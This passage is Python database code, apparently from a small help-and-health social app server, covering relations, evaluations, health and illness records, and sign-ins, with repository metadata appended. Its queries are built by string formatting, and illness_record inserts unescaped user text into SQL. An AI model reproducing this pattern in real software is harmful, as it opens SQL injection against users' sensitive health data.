two users in one direction could only have one type of relation.\n type: 0 indicates family relation.\n 1 indicates geography relation.\n 2 indicates career, interest and general friend relation.\n@return True if successfully adds.\n False otherwise.\n'''\ndef add_static_relation(data):\n if KEY.ID not in data or KEY.USER_ID not in data or KEY.TYPE not in data:\n return False\n sql = \"replace into static_relation (user_a, user_b, type, time) values (%d, %d, %d, now())\"\n try:\n n = dbhelper.execute(sql%(data[KEY.ID], data[KEY.USER_ID], data[KEY.TYPE]))\n if n > 0:\n return True\n else:\n return False\n except:\n return False\n\n\n'''\nremove a static relation of two user.\n@params includes two users' id, one is called id, the other called user_id.\n@return True if successfully removes.\n False otherwise.\n'''\ndef remove_static_relation(data):\n if KEY.ID not in data or KEY.USER_ID not in data:\n return False\n sql = \"delete from static_relation where user_a = %d and user_b = %d\"\n try:\n n = dbhelper.execute(sql%(data[KEY.ID], data[KEY.USER_ID]))\n if n > 0:\n return True\n else:\n return False\n except:\n return False\n\n\n'''\ngive an evaluation to a user in a help event.\n@params includes: id, evaluater.\n user_id, evaluatee.\n event_id, indicates the help event.\n value, the value of evaluation.\n@return True if successfully evaluate.\n Flase otherwise.\n'''\ndef evaluate_user(data):\n if KEY.ID not in data or KEY.USER_ID not in data or KEY.EVENT_ID not in data:\n return False\n if KEY.VALUE not in data:\n return False\n \n value_list = ast.literal_eval(data[KEY.VALUE])\n value = 0.0\n for each_value in value_list:\n value += each_value\n list_len = len(value_list)\n if list_len == 0:\n list_len = 1\n value /= list_len\n\n sql = \"replace into evaluation (event_id, from, to, value, time) values (%d, %d, %d, %f, now())\"\n try:\n dbhelper.execute(sql%(data[KEY.EVENT_ID], data[KEY.ID], data[KEY.USER_ID], value))\n return True\n except:\n return False\n\n\n\n'''\nadd a health record of a user into database.\n@params includes id, user's id.\n type, type of health indicator.\n value, value of some health indicator.\n@return the health record id of the new record.\n -1 indicates fail.\n'''\ndef health_record(data):\n if KEY.ID not in data or KEY.TYPE not in data or KEY.VALUE not in data:\n return -1\n sql = \"insert into health (user_id, type, value, time) values (%d, %d, %f, now())\"\n record_id = -1\n try:\n record_id = dbhelper.insert(sql%(data[KEY.ID], data[KEY.TYPE], data[KEY.VALUE]))\n except:\n record_id = -1\n finally:\n return record_id\n\n\n'''\nget details of one certain health record.\n@params includes record_id, id of the health record.\n@return details of the health record, contains record id, user id, type, certain value and record time.\n None indicates fail query.\n'''\ndef get_health_record(record_id):\n sql = \"select id, user_id, type, value, time from health where id = %d\"\n record = None\n try:\n sql_result = dbhelper.execute_fetchone(sql%(record_id))\n if sql_result is not None:\n record = {}\n record[KEY.HEALTH_ID] = sql_result[0]\n record[KEY.USER_ID] = sql_result[1]\n record[KEY.TYPE] = sql_result[2]\n record[KEY.VALUE] = float(sql_result[3])\n record[KEY.TIME] = str(sql_result[4])\n except:\n record = None\n finally:\n return record\n\n\n'''\nget all health records of a user, but at most 100 records.\n@params includes id, user's id.\n@return a list that contain all health records. 
each element is a json that contains details information of a health record.\n None indicates fail query.\n'''\ndef get_health_records(data):\n if KEY.ID not in data:\n return None\n sql = \"select id from health where user_id = %d order by time DESC limit %d\"\n sql_result = None\n try:\n sql_result = dbhelper.execute_fetchall(sql%(data[KEY.ID], 100))\n except:\n sql_result = None\n records = None\n if sql_result is not None:\n records = []\n for each_result in sql_result:\n for each_id in each_result:\n a_record = get_health_record(each_id)\n if a_record is not None:\n records.append(a_record)\n return records\n\n\n'''\nadd an illness record of a user into database.\n@params includes id, user's id.\n content, illness detail information.\n@return illness record id.\n -1 indicates fail.\n'''\ndef illness_record(data):\n if KEY.ID not in data or KEY.CONTENT not in data:\n return -1\n sql = \"insert into illness (user_id, content, time) values (%d, '%s', now())\"\n illness_id = -1\n try:\n illness_id = dbhelper.insert(sql%(data[KEY.ID], data[KEY.CONTENT]))\n except:\n illness_id = -1\n finally:\n return illness_id\n\n\n'''\nget details of an illness record.\n@params includes record id, indicates which record to be queried.\n@return content of an illness record, includes record's id, user's id, illness content and illness time.\n None indicates fail query or no such record.\n'''\ndef get_illness_record(record_id):\n sql = \"select id, user_id, content, time from illness where id = %d\"\n record = None\n try:\n sql_result = dbhelper.execute_fetchone(sql%(record_id))\n if sql_result is not None:\n record = {}\n record[KEY.ILLNESS_ID] = sql_result[0]\n record[KEY.USER_ID] = sql_result[1]\n record[KEY.CONTENT] = sql_result[2]\n record[KEY.TIME] = str(sql_result[3])\n except:\n record = None\n finally:\n return record\n\n\n'''\nget all illness records of a user, but at most 100 records.\n@params includes: id, user's id.\n@return a list that contain all illness records. each element in the list is a json that is consist of details of an illness record.\n None indicates fail query.\n'''\ndef get_illness_records(data):\n if KEY.ID not in data:\n return None\n sql = \"select id from illness where user_id = %d order by time ASC limit %d\"\n sql_result = None\n records = None\n try:\n sql_result = dbhelper.execute_fetchall(sql%(data[KEY.ID], 100))\n except:\n sql_result = None\n if sql_result is not None:\n records = []\n for each_result in sql_result:\n for each_id in each_result:\n a_record = get_illness_record(each_id)\n if a_record is not None:\n records.append(a_record)\n return records\n\n\n'''\ncreate a loving bank account. It contains loving bank and credit.\n@params includes user_id, user's id, initial coin number and initial score value.\n@return new bank account id if succeed.\n -1 if fail.\n'''\ndef create_loving_bank(data, init_coin=0, init_score=0):\n if KEY.ID not in data:\n return -1\n sql = \"insert into loving_bank (user_id, coin, score, ac_score) values (%d, %d, %d, %d)\"\n try:\n bank_account_id = dbhelper.insert(sql%(data[KEY.ID], init_coin, init_score, init_score))\n return bank_account_id\n except:\n return -1\n\n\n'''\nuser could sign in once a day. Especially, if user has signed in today, this method would return false.\n@params includes user_id. 
user's id.\n@return True if sign in successfully.\n False otherwise.\n'''\ndef sign_in(data):\n if KEY.ID not in data:\n return False\n if is_sign_in(data[KEY.ID]):\n return False\n sql = \"insert into sign_in (user_id, time) values (%d, now())\"\n try:\n sign_in_id = dbhelper.insert(sql%(data[KEY.ID]))\n if sign_in_id > 0:\n return True\n else:\n return False\n except:\n return False\n\n\n'''\ncheck whether a user has signed in today.\n@params includes user_id. user's id.\n@return True if user has signed in.\n False otherwise.\n'''\ndef is_sign_in(user_id):\n result = False\n sql = \"select count(*) from sign_in where user_id = %d and to_days(time) = to_days(now())\"\n try:\n sql_result = dbhelper.execute_fetchone(sql%(user_id))[0]\n if sql_result > 0:\n result = True\n else:\n result = False\n except:\n result = False\n finally:\n return result\n\n\n", "repo_name": "hs-TA/ehelp_server", "sub_path": "database/db.py", "file_name": "db.py", "file_ext": "py", "file_size_in_byte": 25742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "utils.KEY.ACCOUNT", "line_number": 24, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 24, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 24, "usage_type": "attribute"}, {"api_name": "random.sample", "line_number": 27, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 27, "usage_type": "attribute"}, {"api_name": "hashlib.md5", "line_number": 28, "usage_type": "call"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 29, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 29, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 34, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 34, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 34, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 34, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 35, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 35, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 35, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 35, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 49, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 49, "usage_type": "name"}, {"api_name": "utils.KEY.CHAT_TOKEN", "line_number": 49, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 52, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 52, "usage_type": "name"}, {"api_name": "utils.KEY.CHAT_TOKEN", "line_number": 52, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 52, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 52, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 69, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 69, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 74, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 74, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 75, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 75, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 75, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 78, "usage_type": "call"}, 
{"api_name": "dbhelper.dbhelper", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 78, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 78, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 78, "usage_type": "attribute"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 83, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 83, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 84, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 84, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 84, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 87, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 87, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 87, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 87, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 87, "usage_type": "attribute"}, {"api_name": "utils.KEY.GENDER", "line_number": 92, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 92, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 95, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 95, "usage_type": "name"}, {"api_name": "utils.KEY.GENDER", "line_number": 95, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 95, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 95, "usage_type": "attribute"}, {"api_name": "utils.KEY.AGE", "line_number": 100, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 100, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 103, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 103, "usage_type": "name"}, {"api_name": "utils.KEY.AGE", "line_number": 103, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 103, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 103, "usage_type": "attribute"}, {"api_name": "utils.KEY.PHONE", "line_number": 108, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 108, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 111, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 111, "usage_type": "name"}, {"api_name": "utils.KEY.PHONE", "line_number": 111, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 111, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 111, "usage_type": "attribute"}, {"api_name": "utils.KEY.LOCATION", "line_number": 116, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 116, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 117, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 117, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 117, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 120, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 120, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 120, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 120, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 120, "usage_type": "attribute"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "utils.KEY", 
"line_number": 125, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 125, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 128, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 128, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 128, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 128, "usage_type": "attribute"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 132, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 132, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 132, "usage_type": "attribute"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 135, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 135, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 138, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 138, "usage_type": "name"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 138, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 138, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 138, "usage_type": "attribute"}, {"api_name": "utils.KEY.IDENTITY_ID", "line_number": 143, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 143, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 146, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 146, "usage_type": "name"}, {"api_name": "utils.KEY.IDENTITY_ID", "line_number": 146, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 146, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 146, "usage_type": "attribute"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 161, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 161, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 165, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 165, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 165, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 165, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 182, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 182, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 182, "usage_type": "attribute"}, {"api_name": "utils.KEY.SALT", "line_number": 182, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 188, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 188, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 188, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 188, "usage_type": "name"}, {"api_name": "utils.KEY.SALT", "line_number": 188, "usage_type": "attribute"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 195, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 195, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 197, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 197, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 211, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 211, 
"usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 211, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 215, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 215, "usage_type": "name"}, {"api_name": "utils.KEY.PASSWORD", "line_number": 215, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 215, "usage_type": "name"}, {"api_name": "utils.KEY.ACCOUNT", "line_number": 215, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 231, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 231, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 235, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 235, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 235, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 235, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 240, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 240, "usage_type": "name"}, {"api_name": "utils.KEY.NAME", "line_number": 241, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 241, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 242, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 242, "usage_type": "name"}, {"api_name": "utils.KEY.GENDER", "line_number": 243, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 243, "usage_type": "name"}, {"api_name": "utils.KEY.AGE", "line_number": 244, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 244, "usage_type": "name"}, {"api_name": "utils.KEY.PHONE", "line_number": 245, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 245, "usage_type": "name"}, {"api_name": "utils.KEY.LOCATION", "line_number": 246, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 246, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 247, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 247, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 248, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 248, "usage_type": "name"}, {"api_name": "utils.KEY.OCCUPATION", "line_number": 249, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 249, "usage_type": "name"}, {"api_name": "utils.KEY.REPUTATION", "line_number": 250, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 250, "usage_type": "name"}, {"api_name": "utils.KEY.IDENTITY_ID", "line_number": 251, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 251, "usage_type": "name"}, {"api_name": "utils.KEY.IS_VERIFY", "line_number": 252, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 252, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 270, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 270, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 270, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 275, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 275, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 275, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 275, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 275, "usage_type": "attribute"}, {"api_name": 
"utils.KEY.EVENT_ID", "line_number": 277, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 277, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 294, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 294, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 295, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 295, "usage_type": "name"}, {"api_name": "MySQLdb.escape_string", "line_number": 295, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 298, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 298, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 298, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 298, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 298, "usage_type": "attribute"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 303, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 303, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 303, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 306, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 306, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 306, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 306, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 306, "usage_type": "attribute"}, {"api_name": "utils.KEY.STATE", "line_number": 311, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 311, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 312, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 312, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 313, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 313, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 316, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 316, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 316, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 316, "usage_type": "attribute"}, {"api_name": "utils.KEY.ID", "line_number": 332, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 332, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 332, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 336, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 336, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 336, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 336, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 336, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 350, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 350, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 355, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 355, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 355, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 355, 
"usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 358, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 358, "usage_type": "name"}, {"api_name": "utils.KEY.LAUNCHER_ID", "line_number": 359, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 359, "usage_type": "name"}, {"api_name": "utils.KEY.CONTENT", "line_number": 360, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 360, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 361, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 361, "usage_type": "name"}, {"api_name": "utils.KEY.TIME", "line_number": 362, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 362, "usage_type": "name"}, {"api_name": "utils.KEY.LONGITUDE", "line_number": 363, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 363, "usage_type": "name"}, {"api_name": "utils.KEY.LATITUDE", "line_number": 364, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 364, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 365, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 365, "usage_type": "name"}, {"api_name": "utils.KEY.FOLLOW_NUMBER", "line_number": 366, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 366, "usage_type": "name"}, {"api_name": "utils.KEY.SUPPORT_NUMBER", "line_number": 367, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 367, "usage_type": "name"}, {"api_name": "utils.KEY.GROUP_PTS", "line_number": 368, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 368, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 370, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 370, "usage_type": "name"}, {"api_name": "utils.KEY.LAUNCHER_ID", "line_number": 370, "usage_type": "attribute"}, {"api_name": "utils.KEY.LAUNCHER", "line_number": 373, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 373, "usage_type": "name"}, {"api_name": "utils.KEY.NICKNAME", "line_number": 373, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 391, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 391, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 407, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 407, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 409, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 409, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 410, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 410, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 411, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 411, "usage_type": "name"}, {"api_name": "utils.KEY.STATE", "line_number": 412, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 412, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 413, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 413, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 414, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 414, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 415, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 415, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", 
"line_number": 417, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 417, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 433, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 433, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 435, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 435, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 436, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 436, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 437, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 437, "usage_type": "name"}, {"api_name": "utils.KEY.TYPE", "line_number": 438, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 438, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchall", "line_number": 440, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 440, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 454, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 454, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 454, "usage_type": "attribute"}, {"api_name": "utils.KEY.OPERATION", "line_number": 456, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 456, "usage_type": "name"}, {"api_name": "utils.KEY.OPERATION", "line_number": 458, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 458, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.execute_fetchone", "line_number": 463, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 463, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 463, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 463, "usage_type": "name"}, {"api_name": "utils.KEY.OPERATION", "line_number": 470, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 470, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 471, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 471, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 471, "usage_type": "attribute"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 473, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 473, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 473, "usage_type": "attribute"}, {"api_name": "utils.KEY.OPERATION", "line_number": 473, "usage_type": "attribute"}, {"api_name": "dbhelper.dbhelper.execute", "line_number": 475, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 475, "usage_type": "name"}, {"api_name": "utils.KEY.ID", "line_number": 494, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 494, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 494, "usage_type": "attribute"}, {"api_name": "utils.KEY.CONTENT", "line_number": 496, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 496, "usage_type": "name"}, {"api_name": "dbhelper.dbhelper.insert", "line_number": 500, "usage_type": "call"}, {"api_name": "dbhelper.dbhelper", "line_number": 500, "usage_type": "name"}, {"api_name": "utils.KEY.EVENT_ID", "line_number": 500, "usage_type": "attribute"}, {"api_name": "utils.KEY", "line_number": 500, 